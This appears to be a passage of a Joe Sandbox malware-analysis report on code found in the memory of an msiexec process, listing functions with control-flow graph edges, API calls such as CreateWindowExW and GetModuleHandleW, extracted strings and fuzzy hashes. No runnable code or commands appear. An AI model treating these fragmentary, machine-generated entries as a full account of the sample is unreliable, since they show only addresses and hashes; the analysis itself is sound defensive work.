                                                                              Function 2497295A Relevance: .1, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6dacdca8b33c8a609bd2744e5756ccb30826d65491a1942a55610e541a01bc86
                                                                              • Instruction ID: 509748182cfcc9a4d11f6790ca6b2c8d1bed6f28ef3972283b448c641e015da8
                                                                              • Opcode Fuzzy Hash: 6dacdca8b33c8a609bd2744e5756ccb30826d65491a1942a55610e541a01bc86
                                                                              • Instruction Fuzzy Hash: FC41D4B4E05248CFDB18CFAAC5546DDBBF2BF89301F20D16AD415AB269DB385945CF04
                                                                              Function 24B421D9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 24B42426
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID: d]X$d]X
                                                                              • API String ID: 4139908857-1355647457
                                                                              • Opcode ID: 1c17909d61ed713e8045060abff32bd7ab7749fa5516f9a294b37ee635be8ee1
                                                                              • Instruction ID: 54dc5344cb7f6cbe5e9c2f98e582248cdc68eebc863b78aa6d27981bd806e467
                                                                              • Opcode Fuzzy Hash: 1c17909d61ed713e8045060abff32bd7ab7749fa5516f9a294b37ee635be8ee1
                                                                              • Instruction Fuzzy Hash: 6B715270E00B058FDB28CF69D05079ABBF1FF88340F008A2AD58ADBA61D735E945DB91
                                                                              Function 24973AE1 Relevance: 4.0, Strings: 3, Instructions: 278COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 100 24973ae1-24973aee 101 24973af0-24973af4 100->101 102 24973af8 100->102 103 24973af6 101->103 104 24973afe 101->104 102->104 103->102 105 24973b14-24973b16 104->105 106 24973aff-24973b01 104->106 109 24973b21 105->109 110 24973b18-24973b1f 105->110 107 24973b03-24973b0a 106->107 108 24973b0c-24973b10 106->108 111 24973b28-24973b2c 107->111 108->111 112 24973b12 108->112 109->111 110->111 113 24973b33-24973b3a 111->113 114 24973b2e-24973b30 111->114 112->105 115 24973b43-24973b47 113->115 116 24973b3c 113->116 114->113 121 24973c26-24973c29 115->121 122 24973b4d-24973b51 115->122 116->115 117 24973b96-24973b99 116->117 118 24973bc5-24973bc8 116->118 119 24973c61-24973cb4 116->119 120 24973bf8-24973bfb 116->120 125 24973ba4-24973bc3 117->125 126 24973b9b-24973b9e 117->126 130 24973bd3-24973bf6 118->130 131 24973bca-24973bcd 118->131 133 24973cbb-24973ce7 119->133 123 24973c02-24973c21 120->123 124 24973bfd 120->124 127 24973c2b-24973c2e 121->127 128 24973c39-24973c5c 121->128 122->119 129 24973b57-24973b5a 122->129 153 24973b7f-24973b86 call 24974284 123->153 124->123 125->153 126->125 126->133 127->128 134 24973c30-24973c33 127->134 128->153 135 24973b61-24973b7d 129->135 136 24973b5c 129->136 130->153 131->130 137 24973cee-24973d1a 131->137 133->137 134->128 142 24973d21-24973d93 134->142 135->153 136->135 137->142 171 24973df5-24973e59 142->171 172 24973d95-24973d98 142->172 158 24973b8c-24973b93 153->158 191 24973e62-24973e72 171->191 192 24973e5b-24973e60 171->192 172->171 174 24973d9a-24973da9 172->174 178 24973dc1-24973dc5 174->178 179 24973dab-24973db1 174->179 183 24973dc7-24973de7 178->183 184 24973ded-24973df4 178->184 181 24973db5-24973db7 179->181 182 24973db3 179->182 181->178 182->178 183->184 193 24973e77-24973e78 191->193 192->193
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Hnq$Hnq$Hnq
                                                                              • API String ID: 0-1699790779
                                                                              • Opcode ID: c6d7e7d962894eabcdd80b1ac1a785eeece87b6fafa31297a598381565b8527f
                                                                              • Instruction ID: 482de48dcc19e2d36d0f3b7a34deaa5cf13ed6c5d672db93314fce45ca44e019
                                                                              • Opcode Fuzzy Hash: c6d7e7d962894eabcdd80b1ac1a785eeece87b6fafa31297a598381565b8527f
                                                                              • Instruction Fuzzy Hash: D2A1E170B842449FCB259B78949966E3BB6FFC5320F108699E916CB3D2CF798D02C751
                                                                              Function 005B64E0 Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 622 5b64e0-5b64e1 623 5b66cd-5b6705 622->623 624 5b64e2-5b64f6 622->624 635 5b670e-5b6712 623->635 636 5b6707-5b670c 623->636 627 5b650b-5b650e 624->627 628 5b64f8-5b64fb 624->628 629 5b651a-5b6520 627->629 630 5b6510-5b6513 627->630 628->629 632 5b64fd-5b6500 628->632 637 5b6538-5b654d 629->637 638 5b6522-5b6528 629->638 633 5b6566-5b656c 630->633 634 5b6515 630->634 639 5b6601-5b6607 632->639 640 5b6506 632->640 642 5b656e-5b6574 633->642 643 5b6584-5b6596 633->643 641 5b662c-5b6639 634->641 644 5b6718-5b671a 635->644 636->644 666 5b6552-5b6555 637->666 645 5b652a 638->645 646 5b652c-5b6536 638->646 647 5b6609-5b660f 639->647 648 5b661f-5b6629 639->648 640->641 661 5b663b-5b663f 641->661 662 5b664d-5b664f 641->662 649 5b6578-5b6582 642->649 650 5b6576 642->650 664 5b6598-5b65a4 643->664 665 5b65a6-5b65c9 643->665 651 5b672f-5b6736 644->651 652 5b671c-5b672e 644->652 645->637 646->637 654 5b6613-5b661d 647->654 655 5b6611 647->655 648->641 649->643 650->643 654->648 655->648 661->662 668 5b6641-5b6645 661->668 669 5b6653-5b6656 662->669 678 5b65f1-5b65ff 664->678 671 5b66c8 665->671 682 5b65cf-5b65d2 665->682 675 5b655e-5b6561 666->675 670 5b664b 668->670 668->671 669->671 672 5b6658-5b665b 669->672 670->669 671->623 676 5b64d2-5b64de 672->676 677 5b6661-5b6667 672->677 675->641 676->622 680 5b6669-5b666b 677->680 681 5b666d-5b6671 677->681 678->641 684 5b66c0-5b66c7 680->684 685 5b66be 681->685 686 5b6673-5b6679 681->686 682->671 687 5b65d8-5b65ea 682->687 685->684 686->671 688 5b667b-5b667e 686->688 687->678 688->671 689 5b6680-5b6695 688->689 692 5b66b9-5b66bc 689->692 693 5b6697-5b669d 689->693 692->684 694 5b66af-5b66b2 693->694 695 5b669f-5b66ad 693->695 694->671 696 5b66b4-5b66b7 694->696 695->671 695->694 696->692 696->693
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,nq$,nq
                                                                              • API String ID: 0-3932345633
                                                                              • Opcode ID: e5b93a00dcf2b950c799086d92626bc1bbdd6c75deddea6246869f6e46e8b43e
                                                                              • Instruction ID: 7dd5a3ab0cd86263603c0dfc08b01f6205bafe37dde49a7a6006395444a788d1
                                                                              • Opcode Fuzzy Hash: e5b93a00dcf2b950c799086d92626bc1bbdd6c75deddea6246869f6e46e8b43e
                                                                              • Instruction Fuzzy Hash: FE715874A005058FCB24CF68C4989E9BFB2FF89311B658569D406EB3A5DB39FC41CB61
                                                                              Function 005B5F5C Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 698 5b5f5c-5b5f60 699 5b5f88-5b5f8f 698->699 700 5b5f62-5b5f6e 698->700 702 5b5faf-5b5fb8 699->702 703 5b5f91-5b5f98 699->703 700->699 701 5b5f70-5b5f7b 700->701 704 5b6023-5b604f 701->704 705 5b5f81-5b5f83 701->705 800 5b5fba call 5b5f5c 702->800 801 5b5fba call 5b60a0 702->801 703->702 706 5b5f9a-5b5fa5 703->706 708 5b6056-5b60ae 704->708 710 5b601b-5b6020 705->710 707 5b5fab-5b5fad 706->707 706->708 707->710 729 5b60bd-5b60cf 708->729 730 5b60b0-5b60b6 708->730 709 5b5fc0-5b5fc2 712 5b5fca-5b5fd2 709->712 713 5b5fc4-5b5fc8 709->713 715 5b5fe1-5b5fe3 712->715 716 5b5fd4-5b5fd9 712->716 713->712 714 5b5fe5-5b6004 713->714 722 5b6019 714->722 723 5b6006-5b600f 714->723 715->710 716->715 722->710 798 5b6011 call 5bafad 723->798 799 5b6011 call 5baf64 723->799 726 5b6017 726->710 732 5b6163-5b6165 729->732 733 5b60d5-5b60d9 729->733 730->729 802 5b6167 call 5b62f8 732->802 803 5b6167 call 5b6300 732->803 734 5b60db-5b60e7 733->734 735 5b60e9-5b60f6 733->735 743 5b60f8-5b6102 734->743 735->743 736 5b616d-5b6173 737 5b617f-5b6186 736->737 738 5b6175-5b617b 736->738 741 5b617d 738->741 742 5b61e1-5b6240 738->742 741->737 756 5b6247-5b626b 742->756 746 5b612f-5b6133 743->746 747 5b6104-5b6113 743->747 748 5b613f-5b6143 746->748 749 5b6135-5b613b 746->749 758 5b6123-5b612d 747->758 759 5b6115-5b611c 747->759 748->737 753 5b6145-5b6149 748->753 751 5b6189-5b61da 749->751 752 5b613d 749->752 751->742 752->737 755 5b614f-5b6161 753->755 753->756 755->737 766 5b626d-5b626f 756->766 767 5b6271-5b6273 756->767 758->746 759->758 768 5b62e9-5b62ec 766->768 769 5b6275-5b6279 767->769 770 5b6284-5b6286 767->770 774 5b627b-5b627d 769->774 775 5b627f-5b6282 769->775 776 5b6299-5b629f 770->776 777 5b6288-5b628c 770->777 774->768 775->768 781 5b62ca-5b62cc 776->781 782 5b62a1-5b62c8 776->782 778 5b628e-5b6290 777->778 779 5b6292-5b6297 777->779 778->768 779->768 786 5b62d3-5b62d5 781->786 782->786 788 5b62db-5b62dd 786->788 789 5b62d7-5b62d9 786->789 790 5b62df-5b62e4 788->790 791 5b62e6 788->791 789->768 790->768 791->768 798->726 799->726 800->709 801->709 802->736 803->736
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Hnq$Hnq
                                                                              • API String ID: 0-3075287205
                                                                              • Opcode ID: 33c87d24fd7e26f37819e93c83a7fc9dc88a7d4cf05a1cffd247091a387c0a3d
                                                                              • Instruction ID: 3701e189722f5109af51e82c3588af9872967bac668ad235e3948dddec1f36cd
                                                                              • Opcode Fuzzy Hash: 33c87d24fd7e26f37819e93c83a7fc9dc88a7d4cf05a1cffd247091a387c0a3d
                                                                              • Instruction Fuzzy Hash: C251E0353042558FDB269F29C858BBE7FF2BF89300F144969E4468B291DB3ADC02DB91
                                                                              Function 249742D0 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 804 249742d0-249742fd 806 249742ff-24974306 804->806 807 24974308-24974311 804->807 808 24974323-2497432c 806->808 809 24974313-2497431a 807->809 810 2497431c 807->810 811 24974332-2497434f 808->811 812 249743c0-249743c4 808->812 809->808 810->808 813 249743cd-249743e9 811->813 812->813 836 249743c7 call 249744cf 812->836 817 249743f0-2497444a 813->817 818 249743eb-249743ee 813->818 819 24974452-2497445b 817->819 818->817 818->819 820 24974462-24974498 819->820 821 2497445d-24974460 819->821 823 249744c7-249744cd 820->823 832 2497449a-249744bf 820->832 821->820 821->823 832->823 836->813
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8oq$TJoq
                                                                              • API String ID: 0-426483906
                                                                              • Opcode ID: 0072a3acc290bd88dbe56e67eee23b7cc1ce8008387e79f504cf7124de7ac07b
                                                                              • Instruction ID: 2aeb6826d1fccf6958bfe98e4b7b14e87948bc8f160df7aba9cc14884bec3c83
                                                                              • Opcode Fuzzy Hash: 0072a3acc290bd88dbe56e67eee23b7cc1ce8008387e79f504cf7124de7ac07b
                                                                              • Instruction Fuzzy Hash: 81413974A001098FCB05DBA8C584EDDBBFAFF89320F155194E505AB3A6CB71ED85CBA0
                                                                              Function 249742BF Relevance: 2.6, Strings: 2, Instructions: 123COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 837 249742bf-249742fd 839 249742ff-24974306 837->839 840 24974308-24974311 837->840 841 24974323-2497432c 839->841 842 24974313-2497431a 840->842 843 2497431c 840->843 844 24974332-2497434f 841->844 845 249743c0-249743c4 841->845 842->841 843->841 846 249743cd-249743e9 844->846 845->846 869 249743c7 call 249744cf 845->869 850 249743f0-2497444a 846->850 851 249743eb-249743ee 846->851 852 24974452-2497445b 850->852 851->850 851->852 853 24974462-24974498 852->853 854 2497445d-24974460 852->854 856 249744c7-249744cd 853->856 865 2497449a-249744bf 853->865 854->853 854->856 865->856 869->846
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8oq$TJoq
                                                                              • API String ID: 0-426483906
                                                                              • Opcode ID: b51291be69d6636083a88fcedc6cd7cea04d250003a3a027c9402f708c871d4c
                                                                              • Instruction ID: 13722a628e752cdd35e0257285f7ba35a41fbd0500660c06e687d3d1e397d94a
                                                                              • Opcode Fuzzy Hash: b51291be69d6636083a88fcedc6cd7cea04d250003a3a027c9402f708c871d4c
                                                                              • Instruction Fuzzy Hash: DD416975A001058FCB05DBA8C580EDEBBFAFF88320F155194E505AB3A6CB70ED85CB90
                                                                              Function 24974351 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 870 24974351-249743be 877 249743cd-249743e9 870->877 880 249743f0-2497444a 877->880 881 249743eb-249743ee 877->881 882 24974452-2497445b 880->882 881->880 881->882 883 24974462-24974498 882->883 884 2497445d-24974460 882->884 886 249744c7-249744cd 883->886 895 2497449a-249744bf 883->895 884->883 884->886 895->886
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8oq$TJoq
                                                                              • API String ID: 0-426483906
                                                                              • Opcode ID: 5c4f496af4dca450aad94594db502b8c508ff2a4cfa4d622fd8573df8a85c5ac
                                                                              • Instruction ID: cb18062c5bc9457c705d8c7caf7845c385d7e1f8a3bc84c84f70aeb32b7c4329
                                                                              • Opcode Fuzzy Hash: 5c4f496af4dca450aad94594db502b8c508ff2a4cfa4d622fd8573df8a85c5ac
                                                                              • Instruction Fuzzy Hash: 78313570B401098FCB04DBA8C581E9EBBF6FF88320F195590E505AB3B6CA70ED85CB50
                                                                              Function 24974385 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 899 24974385-249743be 906 249743cd-249743e9 899->906 909 249743f0-2497444a 906->909 910 249743eb-249743ee 906->910 911 24974452-2497445b 909->911 910->909 910->911 912 24974462-24974498 911->912 913 2497445d-24974460 911->913 915 249744c7-249744cd 912->915 924 2497449a-249744bf 912->924 913->912 913->915 924->915
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8oq$TJoq
                                                                              • API String ID: 0-426483906
                                                                              • Opcode ID: 8b8bd74f560f9623a22d648ca42208eb588c6519eb6f587cf9acb8b8a4c107ac
                                                                              • Instruction ID: 79f8cdd1b082e836a2b36d2e72d1ac5ef9f6bf514384fa470420a535d62bf3fb
                                                                              • Opcode Fuzzy Hash: 8b8bd74f560f9623a22d648ca42208eb588c6519eb6f587cf9acb8b8a4c107ac
                                                                              • Instruction Fuzzy Hash: 85313770B401098FCB05DBA8C580E9EBBFAFF88320F155594E505AB376CA71ED85CB91
                                                                              Function 24974928 Relevance: 2.6, Strings: 2, Instructions: 70COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 928 24974928 929 2497492a-24974930 928->929 930 24974932 929->930 931 249749a0-249749a5 929->931 934 24974933-2497499a 930->934 935 2497491c-24974927 930->935 932 249749a7-249749a9 931->932 933 249749ab-249749b8 931->933 936 249749ba-249749c6 932->936 933->936 934->931 935->928 947 249749c9 call 24974a40 936->947 948 249749c9 call 249749ea 936->948 939 249749cc-249749d7 947->939 948->939
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Hnq$M/NP
                                                                              • API String ID: 0-1803747802
                                                                              • Opcode ID: 77de2a584763bd363f0eb5394b7874a4d1f87e2f1829f7a08145bc017b14073a
                                                                              • Instruction ID: c894f26de62edfa6ac3958e2174478550dd86339228465231d4a26c2c9fbec34
                                                                              • Opcode Fuzzy Hash: 77de2a584763bd363f0eb5394b7874a4d1f87e2f1829f7a08145bc017b14073a
                                                                              • Instruction Fuzzy Hash: DC212335B05249DFC7069B68C85466D7FB6EFCA311B2480BAE4048B363CA344D07C711
                                                                              Function 005B0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 949 5b0ca0-5b0cc0 950 5b0cc2 949->950 951 5b0cc7-5b108f call 5b0780 * 14 call 5b27f7 949->951 950->951 1127 5b1092 call 5b40f1 951->1127 1128 5b1092 call 5b41a0 951->1128 1033 5b1098-5b16bc call 5b5362 * 2 1114 5b16c8-5b17aa 1033->1114 1127->1033 1128->1033
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LRjq
                                                                              • API String ID: 0-665714880
                                                                              • Opcode ID: 0a408318eca05929846fc45d37297a24f009679c105a27806690c2fb48fd142b
                                                                              • Instruction ID: b2191275250ad5b1ced019895d5eeffcc5384d65dab63be2067f429dac30f943
                                                                              • Opcode Fuzzy Hash: 0a408318eca05929846fc45d37297a24f009679c105a27806690c2fb48fd142b
                                                                              • Instruction Fuzzy Hash: 2452F878940219CFCB54DF24D999A9DBBB6FF48301F1086A5D80DAB368DB746E85CF80
                                                                              Function 24B443A4 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1131 24b443a4-24b443ac 1132 24b443e5-24b44416 1131->1132 1133 24b443ae-24b443de 1131->1133 1135 24b44421-24b44428 1132->1135 1136 24b44418-24b4441e 1132->1136 1133->1132 1137 24b44433-24b4446b 1135->1137 1138 24b4442a-24b44430 1135->1138 1136->1135 1139 24b44473-24b444d2 CreateWindowExW 1137->1139 1138->1137 1140 24b444d4-24b444da 1139->1140 1141 24b444db-24b44513 1139->1141 1140->1141 1145 24b44515-24b44518 1141->1145 1146 24b44520 1141->1146 1145->1146 1147 24b44521 1146->1147 1147->1147
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24B444C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: 20ddcca392a71d0b61a22cd35af9c7844baa38f841976c1bc5c7ce7305c37f6c
                                                                              • Instruction ID: 7ddf099c928f2f9506fb1e2fe8398443adc37585ec70212ec77420be225682d7
                                                                              • Opcode Fuzzy Hash: 20ddcca392a71d0b61a22cd35af9c7844baa38f841976c1bc5c7ce7305c37f6c
                                                                              • Instruction Fuzzy Hash: 8251D0B1D103499FDB14CF9AC990ADEBBF5FF48310F20812AE419AB214D7749881CF90
                                                                              Function 24B4186C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1148 24b4186c-24b44416 1151 24b44421-24b44428 1148->1151 1152 24b44418-24b4441e 1148->1152 1153 24b44433-24b444d2 CreateWindowExW 1151->1153 1154 24b4442a-24b44430 1151->1154 1152->1151 1156 24b444d4-24b444da 1153->1156 1157 24b444db-24b44513 1153->1157 1154->1153 1156->1157 1161 24b44515-24b44518 1157->1161 1162 24b44520 1157->1162 1161->1162 1163 24b44521 1162->1163 1163->1163
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24B444C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: b60f62c995b3b3770099b69b9e6d7b9a5cf5c8d55046cfeb8ca3a65aca6fac53
                                                                              • Instruction ID: 2da5035ef4c7ad1d9e0770ba4e32ea05574ae713dd7d70b9137f7a9fcbef3dfe
                                                                              • Opcode Fuzzy Hash: b60f62c995b3b3770099b69b9e6d7b9a5cf5c8d55046cfeb8ca3a65aca6fac53
                                                                              • Instruction Fuzzy Hash: 3251C0B1D103499FDF14CF9AD994ADEBBB5FF48310F20812AE918AB214D774A841CF90
                                                                              Function 24B46B42 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1164 24b46b42-24b46b47 1165 24b46b49-24b46b80 1164->1165 1166 24b46b9a-24b46bd2 CallWindowProcW 1164->1166 1172 24b46b82-24b46b88 1165->1172 1173 24b46b89-24b46b98 1165->1173 1167 24b46bd4-24b46bda 1166->1167 1168 24b46bdb-24b46bea 1166->1168 1167->1168 1169 24b46c0f-24b46c1c 1168->1169 1172->1173 1173->1169
                                                                              APIs
                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 24B46BC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: CallProcWindow
                                                                              • String ID:
                                                                              • API String ID: 2714655100-0
                                                                              • Opcode ID: 371e45ecbf67bffbe34e25a473da16d4b81b6cf047d757e6926da88be2f7b2b0
                                                                              • Instruction ID: 257f0e59588d17a070420d2bfc40538a4a3657a5552d56777bedfb8170f71948
                                                                              • Opcode Fuzzy Hash: 371e45ecbf67bffbe34e25a473da16d4b81b6cf047d757e6926da88be2f7b2b0
                                                                              • Instruction Fuzzy Hash: 332149B9900305CFCB04CFA4C498B9ABBF5FF89714F20C549D519AB321C378A880DBA0
                                                                              Function 24B423C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1175 24b423c0-24b42400 1176 24b42402-24b42405 1175->1176 1177 24b42408-24b42433 GetModuleHandleW 1175->1177 1176->1177 1178 24b42435-24b4243b 1177->1178 1179 24b4243c-24b42450 1177->1179 1178->1179
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 24B42426
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 054bdccaf7982ba74b504c589b6d7d4abf032a02a597f1cdba0b0eb2c6bae066
                                                                              • Instruction ID: 57f6af2f810f7d7e008d4a2e5a181d398dc417388e65a8f1d4903e8ed2d852a2
                                                                              • Opcode Fuzzy Hash: 054bdccaf7982ba74b504c589b6d7d4abf032a02a597f1cdba0b0eb2c6bae066
                                                                              • Instruction Fuzzy Hash: DB110CB6C002498FCB14CF9AD544A9EFBF4EF89220F10842ADA28B7210C379A545CFA1
                                                                              Function 24B49036 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000024), ref: 24B4908D
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: 77573e42207c7d998aa4a068d9920606102669530027a40d86eb075af3c761e2
                                                                              • Instruction ID: 2277728060d6c983420030ebf40443a3d350f9ded12a57f90f17c639cea28d11
                                                                              • Opcode Fuzzy Hash: 77573e42207c7d998aa4a068d9920606102669530027a40d86eb075af3c761e2
                                                                              • Instruction Fuzzy Hash: 7611E2B59003498FDB20DFAAD584BDEBBF4EB49320F20845AD559A7310C379A584CFA5
                                                                              Function 24B49038 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000024), ref: 24B4908D
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: 7184dd6c04a3b2c45710b59e1079cccd111ede2f31195e13d60073eb8c60d4b9
                                                                              • Instruction ID: d1b846c461681d20ae5daa243726c7fcd9243c357b4bd7adad85a4239739bd13
                                                                              • Opcode Fuzzy Hash: 7184dd6c04a3b2c45710b59e1079cccd111ede2f31195e13d60073eb8c60d4b9
                                                                              • Instruction Fuzzy Hash: EF11E2B59003498FDB20DFAAD544B9EBBF4EB49320F20845AD558A7310C379A584CFA5
                                                                              Function 24974790 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
